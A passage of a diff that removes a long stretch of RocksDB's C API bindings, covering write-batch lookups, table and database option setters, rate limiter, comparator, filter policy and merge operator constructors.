-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = wbwi->rep->GetFromBatch(column_family->rep, options->rep,
-      Slice(key, keylen), &tmp);
-  if (s.ok()) {
-    *vallen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vallen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-char* rocksdb_writebatch_wi_get_from_batch_and_db(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = wbwi->rep->GetFromBatchAndDB(db->rep, options->rep, Slice(key, keylen), &tmp);
-  if (s.ok()) {
-    *vallen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vallen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-char* rocksdb_writebatch_wi_get_from_batch_and_db_cf(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = wbwi->rep->GetFromBatchAndDB(db->rep, options->rep, column_family->rep,
-      Slice(key, keylen), &tmp);
-  if (s.ok()) {
-    *vallen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vallen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-void rocksdb_write_writebatch_wi(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    rocksdb_writebatch_wi_t* wbwi,
-    char** errptr) {
-  WriteBatch* wb = wbwi->rep->GetWriteBatch();
-  SaveError(errptr, db->rep->Write(options->rep, wb));
-}
-
-rocksdb_block_based_table_options_t*
-rocksdb_block_based_options_create() {
-  return new rocksdb_block_based_table_options_t;
-}
-
-void rocksdb_block_based_options_destroy(
-    rocksdb_block_based_table_options_t* options) {
-  delete options;
-}
-
-void rocksdb_block_based_options_set_block_size(
-    rocksdb_block_based_table_options_t* options, size_t block_size) {
-  options->rep.block_size = block_size;
-}
-
-void rocksdb_block_based_options_set_block_size_deviation(
-    rocksdb_block_based_table_options_t* options, int block_size_deviation) {
-  options->rep.block_size_deviation = block_size_deviation;
-}
-
-void rocksdb_block_based_options_set_block_restart_interval(
-    rocksdb_block_based_table_options_t* options, int block_restart_interval) {
-  options->rep.block_restart_interval = block_restart_interval;
-}
-
-void rocksdb_block_based_options_set_filter_policy(
-    rocksdb_block_based_table_options_t* options,
-    rocksdb_filterpolicy_t* filter_policy) {
-  options->rep.filter_policy.reset(filter_policy);
-}
-
-void rocksdb_block_based_options_set_no_block_cache(
-    rocksdb_block_based_table_options_t* options,
-    unsigned char no_block_cache) {
-  options->rep.no_block_cache = no_block_cache;
-}
-
-void rocksdb_block_based_options_set_block_cache(
-    rocksdb_block_based_table_options_t* options,
-    rocksdb_cache_t* block_cache) {
-  if (block_cache) {
-    options->rep.block_cache = block_cache->rep;
-  }
-}
-
-void rocksdb_block_based_options_set_block_cache_compressed(
-    rocksdb_block_based_table_options_t* options,
-    rocksdb_cache_t* block_cache_compressed) {
-  if (block_cache_compressed) {
-    options->rep.block_cache_compressed = block_cache_compressed->rep;
-  }
-}
-
-void rocksdb_block_based_options_set_whole_key_filtering(
-    rocksdb_block_based_table_options_t* options, unsigned char v) {
-  options->rep.whole_key_filtering = v;
-}
-
-void rocksdb_block_based_options_set_format_version(
-    rocksdb_block_based_table_options_t* options, int v) {
-  options->rep.format_version = v;
-}
-
-void rocksdb_block_based_options_set_index_type(
-    rocksdb_block_based_table_options_t* options, int v) {
-  options->rep.index_type = static_cast<BlockBasedTableOptions::IndexType>(v);
-}
-
-void rocksdb_block_based_options_set_hash_index_allow_collision(
-    rocksdb_block_based_table_options_t* options, unsigned char v) {
-  options->rep.hash_index_allow_collision = v;
-}
-
-void rocksdb_block_based_options_set_cache_index_and_filter_blocks(
-    rocksdb_block_based_table_options_t* options, unsigned char v) {
-  options->rep.cache_index_and_filter_blocks = v;
-}
-
-void rocksdb_block_based_options_set_pin_l0_filter_and_index_blocks_in_cache(
-    rocksdb_block_based_table_options_t* options, unsigned char v) {
-  options->rep.pin_l0_filter_and_index_blocks_in_cache = v;
-}
-
-void rocksdb_options_set_block_based_table_factory(
-    rocksdb_options_t *opt,
-    rocksdb_block_based_table_options_t* table_options) {
-  if (table_options) {
-    opt->rep.table_factory.reset(
-        rocksdb::NewBlockBasedTableFactory(table_options->rep));
-  }
-}
-
-
-rocksdb_cuckoo_table_options_t*
-rocksdb_cuckoo_options_create() {
-  return new rocksdb_cuckoo_table_options_t;
-}
-
-void rocksdb_cuckoo_options_destroy(
-    rocksdb_cuckoo_table_options_t* options) {
-  delete options;
-}
-
-void rocksdb_cuckoo_options_set_hash_ratio(
-    rocksdb_cuckoo_table_options_t* options, double v) {
-  options->rep.hash_table_ratio = v;
-}
-
-void rocksdb_cuckoo_options_set_max_search_depth(
-    rocksdb_cuckoo_table_options_t* options, uint32_t v) {
-  options->rep.max_search_depth = v;
-}
-
-void rocksdb_cuckoo_options_set_cuckoo_block_size(
-    rocksdb_cuckoo_table_options_t* options, uint32_t v) {
-  options->rep.cuckoo_block_size = v;
-}
-
-void rocksdb_cuckoo_options_set_identity_as_first_hash(
-    rocksdb_cuckoo_table_options_t* options, unsigned char v) {
-  options->rep.identity_as_first_hash = v;
-}
-
-void rocksdb_cuckoo_options_set_use_module_hash(
-    rocksdb_cuckoo_table_options_t* options, unsigned char v) {
-  options->rep.use_module_hash = v;
-}
-
-void rocksdb_options_set_cuckoo_table_factory(
-    rocksdb_options_t *opt,
-    rocksdb_cuckoo_table_options_t* table_options) {
-  if (table_options) {
-    opt->rep.table_factory.reset(
-        rocksdb::NewCuckooTableFactory(table_options->rep));
-  }
-}
-
-void rocksdb_set_options(
-    rocksdb_t* db, int count, const char* const keys[], const char* const values[], char** errptr) {
-        std::unordered_map<std::string, std::string> options_map;
-        for (int i=0; i<count; i++)
-            options_map[keys[i]] = values[i];
-        SaveError(errptr,
-            db->rep->SetOptions(options_map));
-    }
-
-rocksdb_options_t* rocksdb_options_create() {
-  return new rocksdb_options_t;
-}
-
-void rocksdb_options_destroy(rocksdb_options_t* options) {
-  delete options;
-}
-
-void rocksdb_options_increase_parallelism(
-    rocksdb_options_t* opt, int total_threads) {
-  opt->rep.IncreaseParallelism(total_threads);
-}
-
-void rocksdb_options_optimize_for_point_lookup(
-    rocksdb_options_t* opt, uint64_t block_cache_size_mb) {
-  opt->rep.OptimizeForPointLookup(block_cache_size_mb);
-}
-
-void rocksdb_options_optimize_level_style_compaction(
-    rocksdb_options_t* opt, uint64_t memtable_memory_budget) {
-  opt->rep.OptimizeLevelStyleCompaction(memtable_memory_budget);
-}
-
-void rocksdb_options_optimize_universal_style_compaction(
-    rocksdb_options_t* opt, uint64_t memtable_memory_budget) {
-  opt->rep.OptimizeUniversalStyleCompaction(memtable_memory_budget);
-}
-
-void rocksdb_options_set_compaction_filter(
-    rocksdb_options_t* opt,
-    rocksdb_compactionfilter_t* filter) {
-  opt->rep.compaction_filter = filter;
-}
-
-void rocksdb_options_set_compaction_filter_factory(
-    rocksdb_options_t* opt, rocksdb_compactionfilterfactory_t* factory) {
-  opt->rep.compaction_filter_factory =
-      std::shared_ptr<CompactionFilterFactory>(factory);
-}
-
-void rocksdb_options_compaction_readahead_size(
-    rocksdb_options_t* opt, size_t s) {
-  opt->rep.compaction_readahead_size = s;
-}
-
-void rocksdb_options_set_comparator(
-    rocksdb_options_t* opt,
-    rocksdb_comparator_t* cmp) {
-  opt->rep.comparator = cmp;
-}
-
-void rocksdb_options_set_merge_operator(
-    rocksdb_options_t* opt,
-    rocksdb_mergeoperator_t* merge_operator) {
-  opt->rep.merge_operator = std::shared_ptr<MergeOperator>(merge_operator);
-}
-
-
-void rocksdb_options_set_create_if_missing(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.create_if_missing = v;
-}
-
-void rocksdb_options_set_create_missing_column_families(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.create_missing_column_families = v;
-}
-
-void rocksdb_options_set_error_if_exists(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.error_if_exists = v;
-}
-
-void rocksdb_options_set_paranoid_checks(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.paranoid_checks = v;
-}
-
-void rocksdb_options_set_db_paths(rocksdb_options_t* opt, 
-                                  const rocksdb_dbpath_t** dbpath_values, 
-                                  size_t num_paths) {
-  std::vector<DbPath> db_paths(num_paths);
-  for (size_t i = 0; i < num_paths; ++i) {
-    db_paths[i] = dbpath_values[i]->rep;
-  }
-  opt->rep.db_paths = db_paths;
-}
-
-void rocksdb_options_set_env(rocksdb_options_t* opt, rocksdb_env_t* env) {
-  opt->rep.env = (env ? env->rep : nullptr);
-}
-
-void rocksdb_options_set_info_log(rocksdb_options_t* opt, rocksdb_logger_t* l) {
-  if (l) {
-    opt->rep.info_log = l->rep;
-  }
-}
-
-void rocksdb_options_set_info_log_level(
-    rocksdb_options_t* opt, int v) {
-  opt->rep.info_log_level = static_cast<InfoLogLevel>(v);
-}
-
-void rocksdb_options_set_db_write_buffer_size(rocksdb_options_t* opt,
-                                              size_t s) {
-  opt->rep.db_write_buffer_size = s;
-}
-
-void rocksdb_options_set_write_buffer_size(rocksdb_options_t* opt, size_t s) {
-  opt->rep.write_buffer_size = s;
-}
-
-void rocksdb_options_set_max_open_files(rocksdb_options_t* opt, int n) {
-  opt->rep.max_open_files = n;
-}
-
-void rocksdb_options_set_max_file_opening_threads(rocksdb_options_t* opt, int n) {
-  opt->rep.max_file_opening_threads = n;
-}
-
-void rocksdb_options_set_max_total_wal_size(rocksdb_options_t* opt, uint64_t n) {
-  opt->rep.max_total_wal_size = n;
-}
-
-void rocksdb_options_set_target_file_size_base(
-    rocksdb_options_t* opt, uint64_t n) {
-  opt->rep.target_file_size_base = n;
-}
-
-void rocksdb_options_set_target_file_size_multiplier(
-    rocksdb_options_t* opt, int n) {
-  opt->rep.target_file_size_multiplier = n;
-}
-
-void rocksdb_options_set_max_bytes_for_level_base(
-    rocksdb_options_t* opt, uint64_t n) {
-  opt->rep.max_bytes_for_level_base = n;
-}
-
-void rocksdb_options_set_level_compaction_dynamic_level_bytes(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.level_compaction_dynamic_level_bytes = v;
-}
-
-void rocksdb_options_set_max_bytes_for_level_multiplier(rocksdb_options_t* opt,
-                                                        double n) {
-  opt->rep.max_bytes_for_level_multiplier = n;
-}
-
-void rocksdb_options_set_max_compaction_bytes(rocksdb_options_t* opt,
-                                              uint64_t n) {
-  opt->rep.max_compaction_bytes = n;
-}
-
-void rocksdb_options_set_max_bytes_for_level_multiplier_additional(
-    rocksdb_options_t* opt, int* level_values, size_t num_levels) {
-  opt->rep.max_bytes_for_level_multiplier_additional.resize(num_levels);
-  for (size_t i = 0; i < num_levels; ++i) {
-    opt->rep.max_bytes_for_level_multiplier_additional[i] = level_values[i];
-  }
-}
-
-void rocksdb_options_enable_statistics(rocksdb_options_t* opt) {
-  opt->rep.statistics = rocksdb::CreateDBStatistics();
-}
-
-void rocksdb_options_set_skip_stats_update_on_db_open(rocksdb_options_t* opt, unsigned char val) {
-  opt->rep.skip_stats_update_on_db_open = val;
-}
-
-void rocksdb_options_set_num_levels(rocksdb_options_t* opt, int n) {
-  opt->rep.num_levels = n;
-}
-
-void rocksdb_options_set_level0_file_num_compaction_trigger(
-    rocksdb_options_t* opt, int n) {
-  opt->rep.level0_file_num_compaction_trigger = n;
-}
-
-void rocksdb_options_set_level0_slowdown_writes_trigger(
-    rocksdb_options_t* opt, int n) {
-  opt->rep.level0_slowdown_writes_trigger = n;
-}
-
-void rocksdb_options_set_level0_stop_writes_trigger(
-    rocksdb_options_t* opt, int n) {
-  opt->rep.level0_stop_writes_trigger = n;
-}
-
-void rocksdb_options_set_max_mem_compaction_level(rocksdb_options_t* opt,
-                                                  int n) {}
-
-void rocksdb_options_set_wal_recovery_mode(rocksdb_options_t* opt,int mode) {
-  opt->rep.wal_recovery_mode = static_cast<WALRecoveryMode>(mode);
-}
-
-void rocksdb_options_set_compression(rocksdb_options_t* opt, int t) {
-  opt->rep.compression = static_cast<CompressionType>(t);
-}
-
-void rocksdb_options_set_compression_per_level(rocksdb_options_t* opt,
-                                               int* level_values,
-                                               size_t num_levels) {
-  opt->rep.compression_per_level.resize(num_levels);
-  for (size_t i = 0; i < num_levels; ++i) {
-    opt->rep.compression_per_level[i] =
-      static_cast<CompressionType>(level_values[i]);
-  }
-}
-
-void rocksdb_options_set_compression_options(rocksdb_options_t* opt, int w_bits,
-                                             int level, int strategy,
-                                             int max_dict_bytes) {
-  opt->rep.compression_opts.window_bits = w_bits;
-  opt->rep.compression_opts.level = level;
-  opt->rep.compression_opts.strategy = strategy;
-  opt->rep.compression_opts.max_dict_bytes = max_dict_bytes;
-}
-
-void rocksdb_options_set_prefix_extractor(
-    rocksdb_options_t* opt, rocksdb_slicetransform_t* prefix_extractor) {
-  opt->rep.prefix_extractor.reset(prefix_extractor);
-}
-
-void rocksdb_options_set_use_fsync(
-    rocksdb_options_t* opt, int use_fsync) {
-  opt->rep.use_fsync = use_fsync;
-}
-
-void rocksdb_options_set_db_log_dir(
-    rocksdb_options_t* opt, const char* db_log_dir) {
-  opt->rep.db_log_dir = db_log_dir;
-}
-
-void rocksdb_options_set_wal_dir(
-    rocksdb_options_t* opt, const char* v) {
-  opt->rep.wal_dir = v;
-}
-
-void rocksdb_options_set_WAL_ttl_seconds(rocksdb_options_t* opt, uint64_t ttl) {
-  opt->rep.WAL_ttl_seconds = ttl;
-}
-
-void rocksdb_options_set_WAL_size_limit_MB(
-    rocksdb_options_t* opt, uint64_t limit) {
-  opt->rep.WAL_size_limit_MB = limit;
-}
-
-void rocksdb_options_set_manifest_preallocation_size(
-    rocksdb_options_t* opt, size_t v) {
-  opt->rep.manifest_preallocation_size = v;
-}
-
-// noop
-void rocksdb_options_set_purge_redundant_kvs_while_flush(rocksdb_options_t* opt,
-                                                         unsigned char v) {}
-
-void rocksdb_options_set_use_direct_reads(rocksdb_options_t* opt,
-                                          unsigned char v) {
-  opt->rep.use_direct_reads = v;
-}
-
-void rocksdb_options_set_use_direct_io_for_flush_and_compaction(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.use_direct_io_for_flush_and_compaction = v;
-}
-
-void rocksdb_options_set_allow_mmap_reads(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.allow_mmap_reads = v;
-}
-
-void rocksdb_options_set_allow_mmap_writes(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.allow_mmap_writes = v;
-}
-
-void rocksdb_options_set_is_fd_close_on_exec(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.is_fd_close_on_exec = v;
-}
-
-void rocksdb_options_set_skip_log_error_on_recovery(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.skip_log_error_on_recovery = v;
-}
-
-void rocksdb_options_set_stats_dump_period_sec(
-    rocksdb_options_t* opt, unsigned int v) {
-  opt->rep.stats_dump_period_sec = v;
-}
-
-void rocksdb_options_set_advise_random_on_open(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.advise_random_on_open = v;
-}
-
-void rocksdb_options_set_access_hint_on_compaction_start(
-    rocksdb_options_t* opt, int v) {
-  switch(v) {
-    case 0:
-      opt->rep.access_hint_on_compaction_start = rocksdb::Options::NONE;
-      break;
-    case 1:
-      opt->rep.access_hint_on_compaction_start = rocksdb::Options::NORMAL;
-      break;
-    case 2:
-      opt->rep.access_hint_on_compaction_start = rocksdb::Options::SEQUENTIAL;
-      break;
-    case 3:
-      opt->rep.access_hint_on_compaction_start = rocksdb::Options::WILLNEED;
-      break;
-  }
-}
-
-void rocksdb_options_set_use_adaptive_mutex(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.use_adaptive_mutex = v;
-}
-
-void rocksdb_options_set_bytes_per_sync(
-    rocksdb_options_t* opt, uint64_t v) {
-  opt->rep.bytes_per_sync = v;
-}
-
-void rocksdb_options_set_allow_concurrent_memtable_write(rocksdb_options_t* opt,
-                                                         unsigned char v) {
-  opt->rep.allow_concurrent_memtable_write = v;
-}
-
-void rocksdb_options_set_enable_write_thread_adaptive_yield(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.enable_write_thread_adaptive_yield = v;
-}
-
-void rocksdb_options_set_max_sequential_skip_in_iterations(
-    rocksdb_options_t* opt, uint64_t v) {
-  opt->rep.max_sequential_skip_in_iterations = v;
-}
-
-void rocksdb_options_set_max_write_buffer_number(rocksdb_options_t* opt, int n) {
-  opt->rep.max_write_buffer_number = n;
-}
-
-void rocksdb_options_set_min_write_buffer_number_to_merge(rocksdb_options_t* opt, int n) {
-  opt->rep.min_write_buffer_number_to_merge = n;
-}
-
-void rocksdb_options_set_max_write_buffer_number_to_maintain(
-    rocksdb_options_t* opt, int n) {
-  opt->rep.max_write_buffer_number_to_maintain = n;
-}
-
-void rocksdb_options_set_max_background_compactions(rocksdb_options_t* opt, int n) {
-  opt->rep.max_background_compactions = n;
-}
-
-void rocksdb_options_set_base_background_compactions(rocksdb_options_t* opt,
-                                                     int n) {
-  opt->rep.base_background_compactions = n;
-}
-
-void rocksdb_options_set_max_background_flushes(rocksdb_options_t* opt, int n) {
-  opt->rep.max_background_flushes = n;
-}
-
-void rocksdb_options_set_max_log_file_size(rocksdb_options_t* opt, size_t v) {
-  opt->rep.max_log_file_size = v;
-}
-
-void rocksdb_options_set_log_file_time_to_roll(rocksdb_options_t* opt, size_t v) {
-  opt->rep.log_file_time_to_roll = v;
-}
-
-void rocksdb_options_set_keep_log_file_num(rocksdb_options_t* opt, size_t v) {
-  opt->rep.keep_log_file_num = v;
-}
-
-void rocksdb_options_set_recycle_log_file_num(rocksdb_options_t* opt,
-                                              size_t v) {
-  opt->rep.recycle_log_file_num = v;
-}
-
-void rocksdb_options_set_soft_rate_limit(rocksdb_options_t* opt, double v) {
-  opt->rep.soft_rate_limit = v;
-}
-
-void rocksdb_options_set_hard_rate_limit(rocksdb_options_t* opt, double v) {
-  opt->rep.hard_rate_limit = v;
-}
-
-void rocksdb_options_set_soft_pending_compaction_bytes_limit(rocksdb_options_t* opt, size_t v) {
-  opt->rep.soft_pending_compaction_bytes_limit = v;
-}
-
-void rocksdb_options_set_hard_pending_compaction_bytes_limit(rocksdb_options_t* opt, size_t v) {
-  opt->rep.hard_pending_compaction_bytes_limit = v;
-}
-
-void rocksdb_options_set_rate_limit_delay_max_milliseconds(
-    rocksdb_options_t* opt, unsigned int v) {
-  opt->rep.rate_limit_delay_max_milliseconds = v;
-}
-
-void rocksdb_options_set_max_manifest_file_size(
-    rocksdb_options_t* opt, size_t v) {
-  opt->rep.max_manifest_file_size = v;
-}
-
-void rocksdb_options_set_table_cache_numshardbits(
-    rocksdb_options_t* opt, int v) {
-  opt->rep.table_cache_numshardbits = v;
-}
-
-void rocksdb_options_set_table_cache_remove_scan_count_limit(
-    rocksdb_options_t* opt, int v) {
-  // this option is deprecated
-}
-
-void rocksdb_options_set_arena_block_size(
-    rocksdb_options_t* opt, size_t v) {
-  opt->rep.arena_block_size = v;
-}
-
-void rocksdb_options_set_disable_auto_compactions(rocksdb_options_t* opt, int disable) {
-  opt->rep.disable_auto_compactions = disable;
-}
-
-void rocksdb_options_set_optimize_filters_for_hits(rocksdb_options_t* opt, int v) {
-  opt->rep.optimize_filters_for_hits = v;
-}
-
-void rocksdb_options_set_delete_obsolete_files_period_micros(
-    rocksdb_options_t* opt, uint64_t v) {
-  opt->rep.delete_obsolete_files_period_micros = v;
-}
-
-void rocksdb_options_prepare_for_bulk_load(rocksdb_options_t* opt) {
-  opt->rep.PrepareForBulkLoad();
-}
-
-void rocksdb_options_set_memtable_vector_rep(rocksdb_options_t *opt) {
-  opt->rep.memtable_factory.reset(new rocksdb::VectorRepFactory);
-}
-
-void rocksdb_options_set_memtable_prefix_bloom_size_ratio(
-    rocksdb_options_t* opt, double v) {
-  opt->rep.memtable_prefix_bloom_size_ratio = v;
-}
-
-void rocksdb_options_set_memtable_huge_page_size(rocksdb_options_t* opt,
-                                                 size_t v) {
-  opt->rep.memtable_huge_page_size = v;
-}
-
-void rocksdb_options_set_hash_skip_list_rep(
-    rocksdb_options_t *opt, size_t bucket_count,
-    int32_t skiplist_height, int32_t skiplist_branching_factor) {
-  rocksdb::MemTableRepFactory* factory = rocksdb::NewHashSkipListRepFactory(
-      bucket_count, skiplist_height, skiplist_branching_factor);
-  opt->rep.memtable_factory.reset(factory);
-}
-
-void rocksdb_options_set_hash_link_list_rep(
-    rocksdb_options_t *opt, size_t bucket_count) {
-  opt->rep.memtable_factory.reset(rocksdb::NewHashLinkListRepFactory(bucket_count));
-}
-
-void rocksdb_options_set_plain_table_factory(
-    rocksdb_options_t *opt, uint32_t user_key_len, int bloom_bits_per_key,
-    double hash_table_ratio, size_t index_sparseness) {
-  rocksdb::PlainTableOptions options;
-  options.user_key_len = user_key_len;
-  options.bloom_bits_per_key = bloom_bits_per_key;
-  options.hash_table_ratio = hash_table_ratio;
-  options.index_sparseness = index_sparseness;
-
-  rocksdb::TableFactory* factory = rocksdb::NewPlainTableFactory(options);
-  opt->rep.table_factory.reset(factory);
-}
-
-void rocksdb_options_set_max_successive_merges(
-    rocksdb_options_t* opt, size_t v) {
-  opt->rep.max_successive_merges = v;
-}
-
-void rocksdb_options_set_bloom_locality(
-    rocksdb_options_t* opt, uint32_t v) {
-  opt->rep.bloom_locality = v;
-}
-
-void rocksdb_options_set_inplace_update_support(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.inplace_update_support = v;
-}
-
-void rocksdb_options_set_inplace_update_num_locks(
-    rocksdb_options_t* opt, size_t v) {
-  opt->rep.inplace_update_num_locks = v;
-}
-
-void rocksdb_options_set_report_bg_io_stats(
-    rocksdb_options_t* opt, int v) {
-  opt->rep.report_bg_io_stats = v;
-}
-
-void rocksdb_options_set_compaction_style(rocksdb_options_t *opt, int style) {
-  opt->rep.compaction_style = static_cast<rocksdb::CompactionStyle>(style);
-}
-
-void rocksdb_options_set_universal_compaction_options(rocksdb_options_t *opt, rocksdb_universal_compaction_options_t *uco) {
-  opt->rep.compaction_options_universal = *(uco->rep);
-}
-
-void rocksdb_options_set_fifo_compaction_options(
-    rocksdb_options_t* opt,
-    rocksdb_fifo_compaction_options_t* fifo) {
-  opt->rep.compaction_options_fifo = fifo->rep;
-}
-
-char *rocksdb_options_statistics_get_string(rocksdb_options_t *opt) {
-  rocksdb::Statistics *statistics = opt->rep.statistics.get();
-  if (statistics) {
-    return strdup(statistics->ToString().c_str());
-  }
-  return nullptr;
-}
-
-void rocksdb_options_set_ratelimiter(rocksdb_options_t *opt, rocksdb_ratelimiter_t *limiter) {
-  opt->rep.rate_limiter.reset(limiter->rep);
-  limiter->rep = nullptr;
-}
-
-rocksdb_ratelimiter_t* rocksdb_ratelimiter_create(
-    int64_t rate_bytes_per_sec,
-    int64_t refill_period_us,
-    int32_t fairness) {
-  rocksdb_ratelimiter_t* rate_limiter = new rocksdb_ratelimiter_t;
-  rate_limiter->rep = NewGenericRateLimiter(rate_bytes_per_sec,
-                                            refill_period_us, fairness);
-  return rate_limiter;
-}
-
-void rocksdb_ratelimiter_destroy(rocksdb_ratelimiter_t *limiter) {
-  if (limiter->rep) {
-    delete limiter->rep;
-  }
-  delete limiter;
-}
-
-/*
-TODO:
-DB::OpenForReadOnly
-DB::KeyMayExist
-DB::GetOptions
-DB::GetSortedWalFiles
-DB::GetLatestSequenceNumber
-DB::GetUpdatesSince
-DB::GetDbIdentity
-DB::RunManualCompaction
-custom cache
-table_properties_collectors
-*/
-
-rocksdb_compactionfilter_t* rocksdb_compactionfilter_create(
-    void* state,
-    void (*destructor)(void*),
-    unsigned char (*filter)(
-        void*,
-        int level,
-        const char* key, size_t key_length,
-        const char* existing_value, size_t value_length,
-        char** new_value, size_t *new_value_length,
-        unsigned char* value_changed),
-    const char* (*name)(void*)) {
-  rocksdb_compactionfilter_t* result = new rocksdb_compactionfilter_t;
-  result->state_ = state;
-  result->destructor_ = destructor;
-  result->filter_ = filter;
-  result->ignore_snapshots_ = false;
-  result->name_ = name;
-  return result;
-}
-
-void rocksdb_compactionfilter_set_ignore_snapshots(
-  rocksdb_compactionfilter_t* filter,
-  unsigned char whether_ignore) {
-  filter->ignore_snapshots_ = whether_ignore;
-}
-
-void rocksdb_compactionfilter_destroy(rocksdb_compactionfilter_t* filter) {
-  delete filter;
-}
-
-unsigned char rocksdb_compactionfiltercontext_is_full_compaction(
-    rocksdb_compactionfiltercontext_t* context) {
-  return context->rep.is_full_compaction;
-}
-
-unsigned char rocksdb_compactionfiltercontext_is_manual_compaction(
-    rocksdb_compactionfiltercontext_t* context) {
-  return context->rep.is_manual_compaction;
-}
-
-rocksdb_compactionfilterfactory_t* rocksdb_compactionfilterfactory_create(
-    void* state, void (*destructor)(void*),
-    rocksdb_compactionfilter_t* (*create_compaction_filter)(
-        void*, rocksdb_compactionfiltercontext_t* context),
-    const char* (*name)(void*)) {
-  rocksdb_compactionfilterfactory_t* result =
-      new rocksdb_compactionfilterfactory_t;
-  result->state_ = state;
-  result->destructor_ = destructor;
-  result->create_compaction_filter_ = create_compaction_filter;
-  result->name_ = name;
-  return result;
-}
-
-void rocksdb_compactionfilterfactory_destroy(
-    rocksdb_compactionfilterfactory_t* factory) {
-  delete factory;
-}
-
-rocksdb_comparator_t* rocksdb_comparator_create(
-    void* state,
-    void (*destructor)(void*),
-    int (*compare)(
-        void*,
-        const char* a, size_t alen,
-        const char* b, size_t blen),
-    const char* (*name)(void*)) {
-  rocksdb_comparator_t* result = new rocksdb_comparator_t;
-  result->state_ = state;
-  result->destructor_ = destructor;
-  result->compare_ = compare;
-  result->name_ = name;
-  return result;
-}
-
-void rocksdb_comparator_destroy(rocksdb_comparator_t* cmp) {
-  delete cmp;
-}
-
-rocksdb_filterpolicy_t* rocksdb_filterpolicy_create(
-    void* state,
-    void (*destructor)(void*),
-    char* (*create_filter)(
-        void*,
-        const char* const* key_array, const size_t* key_length_array,
-        int num_keys,
-        size_t* filter_length),
-    unsigned char (*key_may_match)(
-        void*,
-        const char* key, size_t length,
-        const char* filter, size_t filter_length),
-    void (*delete_filter)(
-        void*,
-        const char* filter, size_t filter_length),
-    const char* (*name)(void*)) {
-  rocksdb_filterpolicy_t* result = new rocksdb_filterpolicy_t;
-  result->state_ = state;
-  result->destructor_ = destructor;
-  result->create_ = create_filter;
-  result->key_match_ = key_may_match;
-  result->delete_filter_ = delete_filter;
-  result->name_ = name;
-  return result;
-}
-
-void rocksdb_filterpolicy_destroy(rocksdb_filterpolicy_t* filter) {
-  delete filter;
-}
-
-rocksdb_filterpolicy_t* rocksdb_filterpolicy_create_bloom_format(int bits_per_key, bool original_format) {
-  // Make a rocksdb_filterpolicy_t, but override all of its methods so
-  // they delegate to a NewBloomFilterPolicy() instead of user
-  // supplied C functions.
-  struct Wrapper : public rocksdb_filterpolicy_t {
-    const FilterPolicy* rep_;
-    ~Wrapper() { delete rep_; }
-    const char* Name() const override { return rep_->Name(); }
-    void CreateFilter(const Slice* keys, int n,
-                      std::string* dst) const override {
-      return rep_->CreateFilter(keys, n, dst);
-    }
-    bool KeyMayMatch(const Slice& key, const Slice& filter) const override {
-      return rep_->KeyMayMatch(key, filter);
-    }
-    static void DoNothing(void*) { }
-  };
-  Wrapper* wrapper = new Wrapper;
-  wrapper->rep_ = NewBloomFilterPolicy(bits_per_key, original_format);
-  wrapper->state_ = nullptr;
-  wrapper->delete_filter_ = nullptr;
-  wrapper->destructor_ = &Wrapper::DoNothing;
-  return wrapper;
-}
-
-rocksdb_filterpolicy_t* rocksdb_filterpolicy_create_bloom_full(int bits_per_key) {
-  return rocksdb_filterpolicy_create_bloom_format(bits_per_key, false);
-}
-
-rocksdb_filterpolicy_t* rocksdb_filterpolicy_create_bloom(int bits_per_key) {
-  return rocksdb_filterpolicy_create_bloom_format(bits_per_key, true);
-}
-
-rocksdb_mergeoperator_t* rocksdb_mergeoperator_create(
-    void* state, void (*destructor)(void*),
-    char* (*full_merge)(void*, const char* key, size_t key_length,
-                        const char* existing_value,
-                        size_t existing_value_length,
-                        const char* const* operands_list,
-                        const size_t* operands_list_length, int num_operands,
-                        unsigned char* success, size_t* new_value_length),
-    char* (*partial_merge)(void*, const char* key, size_t key_length,
-                           const char* const* operands_list,
-                           const size_t* operands_list_length, int num_operands,
-                           unsigned char* success, size_t* new_value_length),
-    void (*delete_value)(void*, const char* value, size_t value_length),
-    const char* (*name)(void*)) {
-  rocksdb_mergeoperator_t* result = new rocksdb_mergeoperator_t;
-  result->state_ = state;
-  result->destructor_ = destructor;
-  result->full_merge_ = full_merge;
-  result->partial_merge_ = partial_merge;
-  result->delete_value_ = delete_value;
-  result->name_ = name;
-  return result;
-}
-
-void rocksdb_mergeoperator_destroy(rocksdb_mergeoperator_t* merge_operator) {
-  delete merge_operator;
-}
-
-rocksdb_readoptions_t* rocksdb_readoptions_create() {
-  return new rocksdb_readoptions_t;
-}
-
-void rocksdb_readoptions_destroy(rocksdb_readoptions_t* opt) {
-  delete opt;
-}
-
-void rocksdb_readoptions_set_verify_checksums(
-    rocksdb_readoptions_t* opt,
-    unsigned char v) {
